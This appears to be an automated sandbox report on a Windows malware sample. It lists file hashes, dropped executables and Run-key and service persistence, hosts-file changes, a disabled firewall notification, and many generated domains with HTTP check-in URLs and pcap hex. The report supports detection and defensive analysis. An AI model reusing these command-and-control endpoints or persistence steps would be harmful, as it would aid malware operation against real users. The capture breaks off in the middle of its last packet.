Analysis Date2014-09-06 03:31:42
MD5fa4ca6ec63178e93761628900d1ab0c7
SHA1fddcb15f355672ca8105d3f1312ee818f4629fd7

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: f90ff339b9ece9daa70e5b3bc8778398 sha1: 767daf1042b762a803c8143b6fc081e72cc3b1ad size: 727040
Section.rdata md5: 6a72457cf10b62dbdd4a507b73ea46b9 sha1: 78f4bd5b94c134e77c9d3a55a045cc00bc9d26a8 size: 32256
Section.data md5: b6b0a3f5a1386032d0953da786525c26 sha1: 888ccb2ae968b545a171e1f9e910c82b0eb5bbac size: 123392
Timestamp2014-02-05 01:07:27
PackerMicrosoft Visual C++ ?.?
PEhashc6a02712edb941bf5ec6a4da2ff03691e88227c4
IMPhash487e4e2196cace988b9eeb3eb3535805

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\WINDOWS\system32\jneuadmf\tst
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\bvkbwuq1m98a8hjzsqnkkyh.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\bvkbwuq1m98a8hjzsqnkkyh.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\bvkbwuq1m98a8hjzsqnkkyh.exe

RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Defender List Management Files Authentication ➝
C:\WINDOWS\system32\vpgrqnaotg.exe
Creates FileC:\WINDOWS\system32\jneuadmf\lck
Creates FileC:\WINDOWS\system32\drivers\etc\hosts
Creates FileC:\WINDOWS\system32\jneuadmf\tst
Creates FileC:\WINDOWS\system32\vpgrqnaotg.exe
Creates FileC:\WINDOWS\system32\jneuadmf\etc
Deletes FileC:\WINDOWS\system32\\drivers\etc\hosts
Creates ProcessC:\WINDOWS\system32\vpgrqnaotg.exe
Creates ServiceColor PnP-X Computer Client Window - C:\WINDOWS\system32\vpgrqnaotg.exe

Process
↳ Pid 804

Process
↳ Pid 852

Process
↳ C:\WINDOWS\System32\svchost.exe

RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝
NULL
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG
Creates FileC:\WINDOWS\system32\WBEM\Logs\wbemess.log

Process
↳ Pid 1120

Process
↳ Pid 1208

Process
↳ C:\WINDOWS\system32\spoolsv.exe

RegistryHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\BeepEnabled ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\Print\TypesSupported ➝
7
RegistryHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\SymbolicLinkValue ➝
NULL
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Print\Printers\DefaultSpoolDirectory ➝
C:\WINDOWS\System32\spool\PRINTERS\\x00

Process
↳ Pid 1104

Process
↳ C:\WINDOWS\system32\vpgrqnaotg.exe

RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Security Center\FirewallDisableNotify ➝
1
Creates FileC:\WINDOWS\system32\jneuadmf\tst
Creates FileC:\WINDOWS\system32\jneuadmf\run
Creates FileC:\WINDOWS\system32\hxfockhu.exe
Creates FileC:\WINDOWS\system32\jneuadmf\lck
Creates Filepipe\net\NtControlPipe10
Creates FileC:\WINDOWS\system32\jneuadmf\rng
Creates FileC:\WINDOWS\TEMP\bvkbwuq1sh6a8hj.exe
Creates File\Device\Afd\Endpoint
Creates FileC:\WINDOWS\system32\jneuadmf\cfg
Creates ProcessWATCHDOGPROC "c:\windows\system32\vpgrqnaotg.exe"
Creates ProcessC:\WINDOWS\TEMP\bvkbwuq1sh6a8hj.exe -r 29165 tcp

Process
↳ C:\WINDOWS\system32\vpgrqnaotg.exe

Creates FileC:\WINDOWS\system32\jneuadmf\tst

Process
↳ WATCHDOGPROC "c:\windows\system32\vpgrqnaotg.exe"

Creates FileC:\WINDOWS\system32\jneuadmf\tst

Process
↳ C:\WINDOWS\TEMP\bvkbwuq1sh6a8hj.exe -r 29165 tcp

Creates File\Device\Afd\Endpoint
Winsock DNS239.255.255.250

Network Details:

DNSdonaven4guia.com
Type: A
216.239.138.217
DNSlaloponea.com
Type: A
216.239.138.68
DNSdavedekilai.com
Type: A
66.147.244.161
DNSquicklive.net
Type: A
64.207.144.71
DNSquickserve.net
Type: A
209.68.4.51
DNScloudmine.net
Type: A
74.220.199.8
DNSdarkmine.net
Type: A
216.21.239.197
DNScloudlive.net
Type: A
184.168.221.26
DNSdarklive.net
Type: A
88.208.252.147
DNScloudserve.net
Type: A
109.104.125.198
DNSmilkhouse.net
Type: A
66.151.181.49
DNSwithhouse.net
Type: A
210.114.223.212
DNSwithgift.net
Type: A
112.175.25.100
DNSsightgift.net
Type: A
173.220.70.26
DNScasehouse.net
Type: A
50.63.202.55
DNSheadhouse.net
Type: A
192.185.85.237
DNSquickhouse.net
Type: A
66.151.181.49
DNSquickgift.net
Type: A
66.151.181.49
DNSsickhouse.net
Type: A
146.0.42.103
DNSfredesecas.com
Type: A
DNStablefruit.net
Type: A
DNSstickmarch.net
Type: A
DNSthenmine.net
Type: A
DNSthenlive.net
Type: A
DNSthenserve.net
Type: A
DNSsundayhello.net
Type: A
DNSmosthello.net
Type: A
DNSsundaymine.net
Type: A
DNSmostmine.net
Type: A
DNSsundaylive.net
Type: A
DNSmostlive.net
Type: A
DNSsundayserve.net
Type: A
DNSmostserve.net
Type: A
DNSmeathello.net
Type: A
DNSsickhello.net
Type: A
DNSmeatmine.net
Type: A
DNSsickmine.net
Type: A
DNSmeatlive.net
Type: A
DNSsicklive.net
Type: A
DNSmeatserve.net
Type: A
DNSsickserve.net
Type: A
DNScloudhello.net
Type: A
DNSdarkhello.net
Type: A
DNSdarkserve.net
Type: A
DNStriedhouse.net
Type: A
DNSmilkgift.net
Type: A
DNStriedgift.net
Type: A
DNSmilktuesday.net
Type: A
DNStriedtuesday.net
Type: A
DNSmilkpeace.net
Type: A
DNStriedpeace.net
Type: A
DNSdutyhouse.net
Type: A
DNSdutygift.net
Type: A
DNSwithtuesday.net
Type: A
DNSdutytuesday.net
Type: A
DNSwithpeace.net
Type: A
DNSdutypeace.net
Type: A
DNSthesehouse.net
Type: A
DNSsighthouse.net
Type: A
DNSthesegift.net
Type: A
DNSthesetuesday.net
Type: A
DNSsighttuesday.net
Type: A
DNSthesepeace.net
Type: A
DNSsightpeace.net
Type: A
DNScasegift.net
Type: A
DNSheadgift.net
Type: A
DNScasetuesday.net
Type: A
DNSheadtuesday.net
Type: A
DNScasepeace.net
Type: A
DNSheadpeace.net
Type: A
DNSthenhouse.net
Type: A
DNSthengift.net
Type: A
DNSquicktuesday.net
Type: A
DNSthentuesday.net
Type: A
DNSquickpeace.net
Type: A
DNSthenpeace.net
Type: A
DNSsundayhouse.net
Type: A
DNSmosthouse.net
Type: A
DNSsundaygift.net
Type: A
DNSmostgift.net
Type: A
DNSsundaytuesday.net
Type: A
DNSmosttuesday.net
Type: A
DNSsundaypeace.net
Type: A
DNSmostpeace.net
Type: A
DNSmeathouse.net
Type: A
DNSmeatgift.net
Type: A
DNSsickgift.net
Type: A
DNSmeattuesday.net
Type: A
DNSsicktuesday.net
Type: A
DNSmeatpeace.net
Type: A
DNSsickpeace.net
Type: A
HTTP GEThttp://donaven4guia.com/forum/search.php?method=validate&mode=sox&v=021&sox=3b9d2a02
User-Agent:
HTTP GEThttp://laloponea.com/forum/search.php?method=validate&mode=sox&v=021&sox=3b9d2a02
User-Agent:
HTTP GEThttp://davedekilai.com/forum/search.php?method=validate&mode=sox&v=021&sox=3b9d2a02
User-Agent:
HTTP GEThttp://quicklive.net/forum/search.php?method=validate&mode=sox&v=021&sox=3b9d2a02
User-Agent:
HTTP GEThttp://quickserve.net/forum/search.php?method=validate&mode=sox&v=021&sox=3b9d2a02
User-Agent:
HTTP GEThttp://cloudmine.net/forum/search.php?method=validate&mode=sox&v=021&sox=3b9d2a02
User-Agent:
HTTP GEThttp://darkmine.net/forum/search.php?method=validate&mode=sox&v=021&sox=3b9d2a02
User-Agent:
HTTP GEThttp://cloudlive.net/forum/search.php?method=validate&mode=sox&v=021&sox=3b9d2a02
User-Agent:
HTTP GEThttp://darklive.net/forum/search.php?method=validate&mode=sox&v=021&sox=3b9d2a02
User-Agent:
HTTP GEThttp://cloudserve.net/forum/search.php?method=validate&mode=sox&v=021&sox=3b9d2a02
User-Agent:
HTTP GEThttp://milkhouse.net/forum/search.php?method=validate&mode=sox&v=021&sox=3b9d2a02
User-Agent:
HTTP GEThttp://withhouse.net/forum/search.php?method=validate&mode=sox&v=021&sox=3b9d2a02
User-Agent:
HTTP GEThttp://withgift.net/forum/search.php?method=validate&mode=sox&v=021&sox=3b9d2a02
User-Agent:
HTTP GEThttp://sightgift.net/forum/search.php?method=validate&mode=sox&v=021&sox=3b9d2a02
User-Agent:
HTTP GEThttp://casehouse.net/forum/search.php?method=validate&mode=sox&v=021&sox=3b9d2a02
User-Agent:
HTTP GEThttp://headhouse.net/forum/search.php?method=validate&mode=sox&v=021&sox=3b9d2a02
User-Agent:
HTTP GEThttp://quickhouse.net/forum/search.php?method=validate&mode=sox&v=021&sox=3b9d2a02
User-Agent:
HTTP GEThttp://quickgift.net/forum/search.php?method=validate&mode=sox&v=021&sox=3b9d2a02
User-Agent:
HTTP GEThttp://sickhouse.net/forum/search.php?method=validate&mode=sox&v=021&sox=3b9d2a02
User-Agent:
HTTP GEThttp://donaven4guia.com/forum/search.php?method=validate&mode=sox&v=021&sox=3b9d2a02
User-Agent:
HTTP GEThttp://laloponea.com/forum/search.php?method=validate&mode=sox&v=021&sox=3b9d2a02
User-Agent:
HTTP GEThttp://davedekilai.com/forum/search.php?method=validate&mode=sox&v=021&sox=3b9d2a02
User-Agent:
HTTP GEThttp://quicklive.net/forum/search.php?method=validate&mode=sox&v=021&sox=3b9d2a02
User-Agent:
HTTP GEThttp://quickserve.net/forum/search.php?method=validate&mode=sox&v=021&sox=3b9d2a02
User-Agent:
HTTP GEThttp://cloudmine.net/forum/search.php?method=validate&mode=sox&v=021&sox=3b9d2a02
User-Agent:
HTTP GEThttp://darkmine.net/forum/search.php?method=validate&mode=sox&v=021&sox=3b9d2a02
User-Agent:
HTTP GEThttp://cloudlive.net/forum/search.php?method=validate&mode=sox&v=021&sox=3b9d2a02
User-Agent:
HTTP GEThttp://darklive.net/forum/search.php?method=validate&mode=sox&v=021&sox=3b9d2a02
User-Agent:
HTTP GEThttp://cloudserve.net/forum/search.php?method=validate&mode=sox&v=021&sox=3b9d2a02
User-Agent:
HTTP GEThttp://milkhouse.net/forum/search.php?method=validate&mode=sox&v=021&sox=3b9d2a02
User-Agent:
HTTP GEThttp://withhouse.net/forum/search.php?method=validate&mode=sox&v=021&sox=3b9d2a02
User-Agent:
HTTP GEThttp://withgift.net/forum/search.php?method=validate&mode=sox&v=021&sox=3b9d2a02
User-Agent:
HTTP GEThttp://sightgift.net/forum/search.php?method=validate&mode=sox&v=021&sox=3b9d2a02
User-Agent:
HTTP GEThttp://casehouse.net/forum/search.php?method=validate&mode=sox&v=021&sox=3b9d2a02
User-Agent:
HTTP GEThttp://headhouse.net/forum/search.php?method=validate&mode=sox&v=021&sox=3b9d2a02
User-Agent:
HTTP GEThttp://quickhouse.net/forum/search.php?method=validate&mode=sox&v=021&sox=3b9d2a02
User-Agent:
HTTP GEThttp://quickgift.net/forum/search.php?method=validate&mode=sox&v=021&sox=3b9d2a02
User-Agent:
HTTP GEThttp://sickhouse.net/forum/search.php?method=validate&mode=sox&v=021&sox=3b9d2a02
User-Agent:
Flows TCP192.168.1.1:1036 ➝ 216.239.138.217:80
Flows TCP192.168.1.1:1037 ➝ 216.239.138.68:80
Flows TCP192.168.1.1:1038 ➝ 66.147.244.161:80
Flows TCP192.168.1.1:1039 ➝ 64.207.144.71:80
Flows TCP192.168.1.1:1040 ➝ 209.68.4.51:80
Flows TCP192.168.1.1:1042 ➝ 74.220.199.8:80
Flows TCP192.168.1.1:1043 ➝ 216.21.239.197:80
Flows TCP192.168.1.1:1044 ➝ 184.168.221.26:80
Flows TCP192.168.1.1:1045 ➝ 88.208.252.147:80
Flows TCP192.168.1.1:1046 ➝ 109.104.125.198:80
Flows TCP192.168.1.1:1047 ➝ 66.151.181.49:80
Flows TCP192.168.1.1:1048 ➝ 210.114.223.212:80
Flows TCP192.168.1.1:1049 ➝ 112.175.25.100:80
Flows TCP192.168.1.1:1050 ➝ 173.220.70.26:80
Flows TCP192.168.1.1:1051 ➝ 50.63.202.55:80
Flows TCP192.168.1.1:1052 ➝ 192.185.85.237:80
Flows TCP192.168.1.1:1053 ➝ 66.151.181.49:80
Flows TCP192.168.1.1:1054 ➝ 66.151.181.49:80
Flows TCP192.168.1.1:1055 ➝ 146.0.42.103:80
Flows TCP192.168.1.1:1056 ➝ 216.239.138.217:80
Flows TCP192.168.1.1:1057 ➝ 216.239.138.68:80
Flows TCP192.168.1.1:1058 ➝ 66.147.244.161:80
Flows TCP192.168.1.1:1059 ➝ 64.207.144.71:80
Flows TCP192.168.1.1:1060 ➝ 209.68.4.51:80
Flows TCP192.168.1.1:1061 ➝ 74.220.199.8:80
Flows TCP192.168.1.1:1062 ➝ 216.21.239.197:80
Flows TCP192.168.1.1:1063 ➝ 184.168.221.26:80
Flows TCP192.168.1.1:1064 ➝ 88.208.252.147:80
Flows TCP192.168.1.1:1065 ➝ 109.104.125.198:80
Flows TCP192.168.1.1:1066 ➝ 66.151.181.49:80
Flows TCP192.168.1.1:1067 ➝ 210.114.223.212:80
Flows TCP192.168.1.1:1068 ➝ 112.175.25.100:80
Flows TCP192.168.1.1:1069 ➝ 173.220.70.26:80
Flows TCP192.168.1.1:1070 ➝ 50.63.202.55:80
Flows TCP192.168.1.1:1071 ➝ 192.185.85.237:80
Flows TCP192.168.1.1:1072 ➝ 66.151.181.49:80
Flows TCP192.168.1.1:1073 ➝ 66.151.181.49:80
Flows TCP192.168.1.1:1074 ➝ 146.0.42.103:80

Raw Pcap
0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d73 6f782676   idate&mode=sox&v
0x00000030 (00048)   3d303231 26736f78 3d336239 64326130   =021&sox=3b9d2a0
0x00000040 (00064)   32204854 54502f31 2e300d0a 41636365   2 HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a20646f 6e617665 6e346775 69612e63   : donaven4guia.c
0x00000080 (00128)   6f6d0d0a 0d0a                         om....

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d73 6f782676   idate&mode=sox&v
0x00000030 (00048)   3d303231 26736f78 3d336239 64326130   =021&sox=3b9d2a0
0x00000040 (00064)   32204854 54502f31 2e300d0a 41636365   2 HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a206c61 6c6f706f 6e65612e 636f6d0d   : laloponea.com.
0x00000080 (00128)   0a0d0a0a 0d0a                         ......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d73 6f782676   idate&mode=sox&v
0x00000030 (00048)   3d303231 26736f78 3d336239 64326130   =021&sox=3b9d2a0
0x00000040 (00064)   32204854 54502f31 2e300d0a 41636365   2 HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a206461 76656465 6b696c61 692e636f   : davedekilai.co
0x00000080 (00128)   6d0d0a0d 0a0a                         m.....

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d73 6f782676   idate&mode=sox&v
0x00000030 (00048)   3d303231 26736f78 3d336239 64326130   =021&sox=3b9d2a0
0x00000040 (00064)   32204854 54502f31 2e300d0a 41636365   2 HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207175 69636b6c 6976652e 6e65740d   : quicklive.net.
0x00000080 (00128)   0a0d0a0d 0a0a                         ......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d73 6f782676   idate&mode=sox&v
0x00000030 (00048)   3d303231 26736f78 3d336239 64326130   =021&sox=3b9d2a0
0x00000040 (00064)   32204854 54502f31 2e300d0a 41636365   2 HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207175 69636b73 65727665 2e6e6574   : quickserve.net
0x00000080 (00128)   0d0a0d0a 0a0a                         ......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d73 6f782676   idate&mode=sox&v
0x00000030 (00048)   3d303231 26736f78 3d336239 64326130   =021&sox=3b9d2a0
0x00000040 (00064)   32204854 54502f31 2e300d0a 41636365   2 HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a20636c 6f75646d 696e652e 6e65740d   : cloudmine.net.
0x00000080 (00128)   0a0d0a0a 0a0a                         ......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d73 6f782676   idate&mode=sox&v
0x00000030 (00048)   3d303231 26736f78 3d336239 64326130   =021&sox=3b9d2a0
0x00000040 (00064)   32204854 54502f31 2e300d0a 41636365   2 HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a206461 726b6d69 6e652e6e 65740d0a   : darkmine.net..
0x00000080 (00128)   0d0a0a0a 0a0a                         ......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d73 6f782676   idate&mode=sox&v
0x00000030 (00048)   3d303231 26736f78 3d336239 64326130   =021&sox=3b9d2a0
0x00000040 (00064)   32204854 54502f31 2e300d0a 41636365   2 HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a20636c 6f75646c 6976652e 6e65740d   : cloudlive.net.
0x00000080 (00128)   0a0d0a0a 0a0a                         ......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d73 6f782676   idate&mode=sox&v
0x00000030 (00048)   3d303231 26736f78 3d336239 64326130   =021&sox=3b9d2a0
0x00000040 (00064)   32204854 54502f31 2e300d0a 41636365   2 HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a206461 726b6c69 76652e6e 65740d0a   : darklive.net..
0x00000080 (00128)   0d0a0a0a 0a0a                         ......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d73 6f782676   idate&mode=sox&v
0x00000030 (00048)   3d303231 26736f78 3d336239 64326130   =021&sox=3b9d2a0
0x00000040 (00064)   32204854 54502f31 2e300d0a 41636365   2 HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a20636c 6f756473 65727665 2e6e6574   : cloudserve.net
0x00000080 (00128)   0d0a0d0a 0a0a                         ......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d73 6f782676   idate&mode=sox&v
0x00000030 (00048)   3d303231 26736f78 3d336239 64326130   =021&sox=3b9d2a0
0x00000040 (00064)   32204854 54502f31 2e300d0a 41636365   2 HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a206d69 6c6b686f 7573652e 6e65740d   : milkhouse.net.
0x00000080 (00128)   0a0d0a0a 0a0a                         ......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d73 6f782676   idate&mode=sox&v
0x00000030 (00048)   3d303231 26736f78 3d336239 64326130   =021&sox=3b9d2a0
0x00000040 (00064)   32204854 54502f31 2e300d0a 41636365   2 HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207769 7468686f 7573652e 6e65740d   : withhouse.net.
0x00000080 (00128)   0a0d0a0a 0a0a                         ......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d73 6f782676   idate&mode=sox&v
0x00000030 (00048)   3d303231 26736f78 3d336239 64326130   =021&sox=3b9d2a0
0x00000040 (00064)   32204854 54502f31 2e300d0a 41636365   2 HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207769 74686769 66742e6e 65740d0a   : withgift.net..
0x00000080 (00128)   0d0a0a0a 0a0a                         ......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d73 6f782676   idate&mode=sox&v
0x00000030 (00048)   3d303231 26736f78 3d336239 64326130   =021&sox=3b9d2a0
0x00000040 (00064)   32204854 54502f31 2e300d0a 41636365   2 HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207369 67687467 6966742e 6e65740d   : sightgift.net.
0x00000080 (00128)   0a0d0a0a 0a0a                         ......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d73 6f782676   idate&mode=sox&v
0x00000030 (00048)   3d303231 26736f78 3d336239 64326130   =021&sox=3b9d2a0
0x00000040 (00064)   32204854 54502f31 2e300d0a 41636365   2 HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a206361 7365686f 7573652e 6e65740d   : casehouse.net.
0x00000080 (00128)   0a0d0a0a 0a0a                         ......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d73 6f782676   idate&mode=sox&v
0x00000030 (00048)   3d303231 26736f78 3d336239 64326130   =021&sox=3b9d2a0
0x00000040 (00064)   32204854 54502f31 2e300d0a 41636365   2 HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a206865 6164686f 7573652e 6e65740d   : headhouse.net.
0x00000080 (00128)   0a0d0a0a 0a0a                         ......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d73 6f782676   idate&mode=sox&v
0x00000030 (00048)   3d303231 26736f78 3d336239 64326130   =021&sox=3b9d2a0
0x00000040 (00064)   32204854 54502f31 2e300d0a 41636365   2 HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207175 69636b68 6f757365 2e6e6574   : quickhouse.net
0x00000080 (00128)   0d0a0d0a 0a0a                         ......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d73 6f782676   idate&mode=sox&v
0x00000030 (00048)   3d303231 26736f78 3d336239 64326130   =021&sox=3b9d2a0
0x00000040 (00064)   32204854 54502f31 2e300d0a 41636365   2 HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207175 69636b67 6966742e 6e65740d   : quickgift.net.
0x00000080 (00128)   0a0d0a0a 0a0a                         ......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d73 6f782676   idate&mode=sox&v
0x00000030 (00048)   3d303231 26736f78 3d336239 64326130   =021&sox=3b9d2a0
0x00000040 (00064)   32204854 54502f31 2e300d0a 41636365   2 HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207369 636b686f 7573652e 6e65740d   : sickhouse.net.
0x00000080 (00128)   0a0d0a0a 0a0a                         ......

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d73 6f782676   idate&mode=sox&v
0x00000030 (00048)   3d303231 26736f78 3d336239 64326130   =021&sox=3b9d2a0
0x00000040 (00064)   32204854 54502f31 2e300d0a 41636365   2 HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a20646f 6e617665 6e346775 69612e63   : donaven4guia.c
0x00000080 (00128)   6f6d0d0a 0d0a                         om....

0x00000000 (00000)   47455420 2f666f72 756d2f73 65617263   GET /forum/searc
0x00000010 (00016)   682e7068 703f6d65 74686f64 3d76616c   h.php?method=val
0x00000020 (00032)   69646174 65266d6f 64653d73 6f782676   idate&mode=sox&v
0x00000030 (00048)   3d303231 26736f78 3d336239 64326130   =021&sox=3b9d2a0
0x00000040 (00064)   32204854 54502f31 2e300d0a 41636365   2 HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
